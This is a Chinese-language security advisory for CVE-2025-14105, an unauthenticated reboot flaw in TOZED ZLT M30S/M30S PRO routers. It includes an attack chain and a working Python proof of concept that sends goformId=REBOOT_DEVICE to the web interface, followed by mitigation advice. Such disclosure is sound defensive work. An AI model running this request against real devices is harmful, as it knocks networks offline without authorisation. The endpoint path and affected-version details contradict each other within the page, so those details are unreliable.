CVE-2025-14105 CVSS 4.3 中危

TOZED ZLT M30S/M30S PRO Web接口拒绝服务漏洞(CVE-2025-14105)

披露日期: 2025-12-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-14105

漏洞类型

拒绝服务(Denial of Service)

CVSS评分

4.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TOZED ZLT M30S, TOZED ZLT M30S PRO

漏洞概述

TOZED ZLT M30S和M30S PRO路由器存在一个未经认证的拒绝服务漏洞。该漏洞位于设备的Web管理界面，攻击者可以通过向/reqproc/proc_post端点发送特制的请求，利用goformId参数值为REBOOT_DEVICE来触发设备重启。由于该漏洞无需认证即可利用，攻击者可以在局域网内任意操控受影响设备，导致其服务中断。漏洞影响固件版本1.47和3.09.06，攻击复杂度低，但需要攻击者处于本地网络环境中。此漏洞已被公开披露，厂商在收到提前通知后未做出任何回应。

技术细节

该漏洞源于TOZED ZLT M30S/M30S PRO路由器Web接口对请求参数缺乏有效验证。具体问题出在/repproc/proc_post端点，该端点处理HTTP POST请求时，直接将goformId参数值传递给后端处理逻辑。当goformId参数被设置为REBOOT_DEVICE时，系统会执行设备重启操作，而此操作并未进行权限验证或请求来源校验。攻击者只需构造一个简单的HTTP POST请求，将goformId参数设置为REBOOT_DEVICE，即可触发设备重启。这种未经授权的重启操作会导致路由器暂时不可用，影响网络连接和所有依赖该设备的网络服务。攻击者可以在内网环境中批量发送此类请求，造成大规模服务中断。

攻击链分析

STEP 1

步骤1

攻击者位于局域网内，识别目标TOZED ZLT M30S/M30S PRO路由器IP地址

STEP 2

步骤2

构造恶意HTTP POST请求，目标URL指向/repproc/proc_post端点

STEP 3

步骤3

在请求参数中设置goformId=REBOOT_DEVICE，无需任何认证信息

STEP 4

步骤4

发送请求到目标设备，设备接收到恶意请求后执行重启操作

STEP 5

步骤5

设备进入重启过程，网络连接中断，所有依赖该设备的网络服务不可用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_ip = "192.168.1.1"  # Replace with target device IP
target_url = f"http://{target_ip}/reqproc/proc_post"

payload = {
    "goformId": "REBOOT_DEVICE"
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0"
}

try:
    response = requests.post(target_url, data=payload, headers=headers, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    print("DoS payload sent successfully - Device should reboot")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

影响范围

TOZED ZLT M30S < 1.47

TOZED ZLT M30S PRO < 3.09.06

防御指南

临时缓解措施

由于厂商未响应安全通知，建议采取以下临时措施：1)使用网络ACL限制对路由器管理端口(80/443)的访问，仅允许受信任的管理IP访问；2)在内网中部署入侵检测系统监控异常的/repproc/proc_post请求；3)使用VPN或跳板机进行设备管理，避免直接暴露管理接口；4)定期检查设备状态，确保未被利用进行DDoS攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14105
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14105
3 Details https://www.cvedetails.com/cve/CVE-2025-14105/
4 VulDB https://vuldb.com/cve/CVE-2025-14105
5 Link https://vuldb.com/?ctiid.334487
6 Link https://vuldb.com/?id.334487
7 Link https://vuldb.com/?submit.696740
8 Link https://youtu.be/RNgsrnPPxgQ

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表